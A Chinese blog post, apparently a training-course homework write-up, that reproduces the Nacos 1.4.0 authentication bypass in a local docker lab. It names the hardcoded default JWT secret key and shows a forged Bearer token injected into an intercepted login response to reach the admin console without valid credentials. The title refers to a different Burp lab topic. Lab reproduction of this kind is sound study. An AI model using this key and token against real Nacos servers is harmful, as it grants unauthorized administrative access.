在阿一网络安全培训学习的第20天!课后作业Burp靶场访问控制漏洞

本文讲述了Nacos1.4.0版本中的一个安全漏洞,攻击者可以通过获取默认token.secret.key构造JWT并登录后台,即使密码错误。文章详细介绍了漏洞环境搭建、复现步骤以及如何利用此漏洞进行登录和抓包。
摘要由CSDN通过智能技术生成

Nacos
该漏洞存在的原因是因为该版本nacos中,token.secret.key值是固定死的然后使用该默认key可以构造JWT
登陆时进行抓包,替换返回包中的token值
即使账号密码错误,也可登陆后台管理界面
详细原理
环境搭建
下载
配置
访问
docker pull nacos/nacos-server
docker run \
--name nacos -d \
-p 8850 :8848 \
--privileged = true \
--restart = always \
-e JVM_XMS = 256m \
-e JVM_XMX = 256m \
-e MODE = standalone \
-e PREFER_HOST_MODE = hostname \
nacos/nacos-server:1.4.0
访问
登录
初始账号密码都为 nacos
漏洞复现
获取默认token.secret.key
位于conf下的application.properties中
构造jwt
进入页面
SecretKey012345678901234567890123456789012345678901234567890123456789
时间获取
进行参数修改
使用生成token登录
进入页面
账号密码随意
登录抓包
添加身份令牌
将生成的身份令牌添加进去
Authorization: Bearer
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMzQwNzY5OH0.4LPHb
u2SkDChVJ18ysoLS7Tm705ZeJyMy67ZfoMHnBs
#
放包后查看返回包
返回 200 token 为生成的 token
登陆成功
  • 10
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值